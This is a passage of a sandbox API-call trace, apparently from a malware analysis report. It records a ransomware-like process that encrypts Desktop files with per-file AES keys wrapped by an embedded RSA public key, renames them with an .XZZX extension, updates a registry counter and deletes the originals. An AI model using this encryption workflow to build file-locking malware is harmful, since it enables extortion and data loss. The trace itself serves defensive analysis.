[4]=0x6a, [5]=0x64, [6]=0x50, [7]=0x8f))) returned 0x0 [0163.587] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cjwLkHotFDrB.csv") returned 58 [0163.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0163.587] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\831028C931A43BD1AECC4481344F2019.XZZX") returned 79 [0163.587] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="XZZX") returned 0x0 [0163.587] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cjwLkHotFDrB.csv", dwFileAttributes=0x20) returned 1 [0163.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cjwLkHotFDrB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cjwlkhotfdrb.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0163.589] ReadFile (in: hFile=0x208, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x14397, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x2aae418*=0x14397, lpOverlapped=0x0) returned 1 [0163.590] CloseHandle (hObject=0x208) returned 1 [0163.590] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1cc0000 [0163.591] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cd0000 [0163.591] SetErrorMode (uMode=0x1) returned 0x1 [0163.591] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0163.591] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc14b8) returned 1 [0163.593] CryptGenKey (in: hProv=0x3cc14b8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43724b8) returned 1 [0163.783] CryptExportKey (in: hKey=0x43724b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0163.783] CryptExportKey (in: hKey=0x43724b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cd0000, pdwDataLen=0x2aae41c | out: pbData=0x1cd0000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0163.783] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.783] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0163.783] CryptDestroyKey (hKey=0x43724b8) returned 1 [0163.783] CryptReleaseContext (hProv=0x3cc14b8, dwFlags=0x0) returned 0 [0163.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\831028C931A43BD1AECC4481344F2019.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\831028c931a43bd1aecc4481344f2019.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0163.784] WriteFile (in: hFile=0x1ac, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x14397, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x2aae438*=0x14397, lpOverlapped=0x0) returned 1 [0163.786] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14397 [0163.786] WriteFile (in: hFile=0x1ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0163.786] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1439c [0163.786] WriteFile (in: hFile=0x1ac, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x20, lpOverlapped=0x0) returned 1 [0163.786] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x143bc [0163.786] WriteFile (in: hFile=0x1ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0163.786] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x143c1 [0163.786] SetErrorMode (uMode=0x1) returned 0x1 [0163.786] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0163.786] OutputDebugStringW (lpOutputString="end") [0163.787] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0163.787] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0163.787] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc1540) returned 1 [0163.787] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1540, dwCertEncodingType=0x1, pInfo=0x437e458*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e488*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e490*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x43724b8) returned 1 [0163.787] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.788] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0163.788] CryptEncrypt (in: hKey=0x43724b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0163.788] CryptEncrypt (in: hKey=0x43724b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc16d8*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc16d8*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0163.788] WriteFile (in: hFile=0x1ac, lpBuffer=0x3cc16d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc16d8*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0163.788] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0163.788] WriteFile (in: hFile=0x1ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0163.788] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0163.789] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0163.789] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x22c) returned 0x0 [0163.789] RegQueryValueExW (in: hKey=0x22c, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xdf, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0163.789] RegCloseKey (hKey=0x22c) returned 0x0 [0163.789] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x22c) returned 0x0 [0163.789] RegSetValueExW (in: hKey=0x22c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xe0, cbData=0x4 | out: lpData=0x2aadfec*=0xe0) returned 0x0 [0163.789] RegCloseKey (hKey=0x22c) returned 0x0 [0163.789] VirtualFree (lpAddress=0x1cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.789] VirtualFree (lpAddress=0x1cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.790] CloseHandle (hObject=0x1ac) returned 1 [0163.790] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0163.790] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0163.790] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cjwLkHotFDrB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cjwlkhotfdrb.csv")) returned 1 [0163.792] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cjwLkHotFDrB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cjwlkhotfdrb.csv")) returned 0 Thread: id = 549 os_tid = 0x328 [0163.793] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.794] lstrcpyW (in: lpString1=0x2caf460, lpString2="CtU1cr28O6YeLq5MF4zr.mp3" | out: lpString1="CtU1cr28O6YeLq5MF4zr.mp3") returned="CtU1cr28O6YeLq5MF4zr.mp3" [0163.794] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.794] SetErrorMode (uMode=0x1) returned 0x1 [0163.794] lstrcpyW (in: lpString1=0x2caf860, lpString2="CtU1cr28O6YeLq5MF4zr.mp3" | out: lpString1="CtU1cr28O6YeLq5MF4zr.mp3") returned="CtU1cr28O6YeLq5MF4zr.mp3" [0163.794] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8dbf782c, Data2=0xb2ed, Data3=0x4f3d, Data4=([0]=0x99, [1]=0xce, [2]=0x16, [3]=0xbd, [4]=0xdf, [5]=0x6a, [6]=0x5, [7]=0xea))) returned 0x0 [0163.794] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CtU1cr28O6YeLq5MF4zr.mp3") returned 66 [0163.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0163.794] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX") returned 79 [0163.794] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="XZZX") returned 0x0 [0163.794] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CtU1cr28O6YeLq5MF4zr.mp3", dwFileAttributes=0x20) returned 1 [0163.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CtU1cr28O6YeLq5MF4zr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ctu1cr28o6yelq5mf4zr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0163.794] ReadFile (in: hFile=0x210, lpBuffer=0x43a0bd8, nNumberOfBytesToRead=0x116ea, lpNumberOfBytesRead=0x2cae418, lpOverlapped=0x0 | out: lpBuffer=0x43a0bd8*, lpNumberOfBytesRead=0x2cae418*=0x116ea, lpOverlapped=0x0) returned 1 [0163.795] CloseHandle (hObject=0x210) returned 1 [0163.795] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0163.796] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0163.796] SetErrorMode (uMode=0x1) returned 0x1 [0163.796] lstrcpyW (in: lpString1=0x2cae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0163.796] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1760) returned 1 [0163.798] CryptGenKey (in: hProv=0x3cc1760, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372538) returned 1 [0163.915] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2cae41c | out: pbData=0x0*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0163.915] CryptExportKey (in: hKey=0x4372538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2cae41c | out: pbData=0x1c70000*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0163.915] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.916] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0163.916] CryptDestroyKey (hKey=0x4372538) returned 1 [0163.916] CryptReleaseContext (hProv=0x3cc1760, dwFlags=0x0) returned 1 [0163.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5bd0d8bc3761c5798dbf782c3a2ca9c1.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0163.917] WriteFile (in: hFile=0x210, lpBuffer=0x43a0bd8*, nNumberOfBytesToWrite=0x116ea, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x43a0bd8*, lpNumberOfBytesWritten=0x2cae438*=0x116ea, lpOverlapped=0x0) returned 1 [0163.918] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x116ea [0163.918] WriteFile (in: hFile=0x210, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0163.918] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x116ef [0163.919] WriteFile (in: hFile=0x210, lpBuffer=0x2caf860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x2caf860*, lpNumberOfBytesWritten=0x2cae438*=0x30, lpOverlapped=0x0) returned 1 [0163.919] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1171f [0163.919] WriteFile (in: hFile=0x210, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0163.919] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11724 [0163.919] SetErrorMode (uMode=0x1) returned 0x1 [0163.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0163.919] OutputDebugStringW (lpOutputString="end") [0163.919] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`ÕÊ\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0163.919] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2cadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8 | out: pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8) returned 1 [0163.919] CryptAcquireContextW (in: phProv=0x2cad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2cad3e4*=0x3cc1760) returned 1 [0163.920] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1760, dwCertEncodingType=0x1, pInfo=0x437e2b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e2e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e2f0*, PublicKey.cUnusedBits=0x0), phKey=0x2cad3ec | out: phKey=0x2cad3ec*=0x43725f8) returned 1 [0163.920] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.920] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0163.920] CryptEncrypt (in: hKey=0x43725f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2cad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2cad3f0*=0x80) returned 1 [0163.920] CryptEncrypt (in: hKey=0x43725f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc17e8*, pdwDataLen=0x2cad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc17e8*, pdwDataLen=0x2cad3e8*=0x80) returned 1 [0163.921] WriteFile (in: hFile=0x210, lpBuffer=0x3cc17e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc17e8*, lpNumberOfBytesWritten=0x2cae438*=0x80, lpOverlapped=0x0) returned 1 [0163.921] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0163.921] WriteFile (in: hFile=0x210, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0163.921] GetUserNameW (in: lpBuffer=0x2cae1f8, pcbBuffer=0x2cadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cadfe0) returned 1 [0163.921] wsprintfW (in: param_1=0x2cadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0163.921] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe4 | out: phkResult=0x2cadfe4*=0x1a0) returned 0x0 [0163.921] RegQueryValueExW (in: hKey=0x1a0, lpValueName="E1010314", lpReserved=0x0, lpType=0x2cadfd8, lpData=0x2cadfec, lpcbData=0x2cadfdc*=0x4 | out: lpType=0x2cadfd8*=0x4, lpData=0x2cadfec*=0xe0, lpcbData=0x2cadfdc*=0x4) returned 0x0 [0163.921] RegCloseKey (hKey=0x1a0) returned 0x0 [0163.921] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe8 | out: phkResult=0x2cadfe8*=0x1a0) returned 0x0 [0163.921] RegSetValueExW (in: hKey=0x1a0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2cadfec*=0xe1, cbData=0x4 | out: lpData=0x2cadfec*=0xe1) returned 0x0 [0163.922] RegCloseKey (hKey=0x1a0) returned 0x0 [0163.922] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.922] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.922] CloseHandle (hObject=0x210) returned 1 [0163.922] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0163.923] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0163.923] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CtU1cr28O6YeLq5MF4zr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ctu1cr28o6yelq5mf4zr.mp3")) returned 1 [0163.924] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CtU1cr28O6YeLq5MF4zr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ctu1cr28o6yelq5mf4zr.mp3")) returned 0 Thread: id = 550 os_tid = 0x404 [0164.074] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.074] lstrcpyW (in: lpString1=0x29af460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0164.074] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") 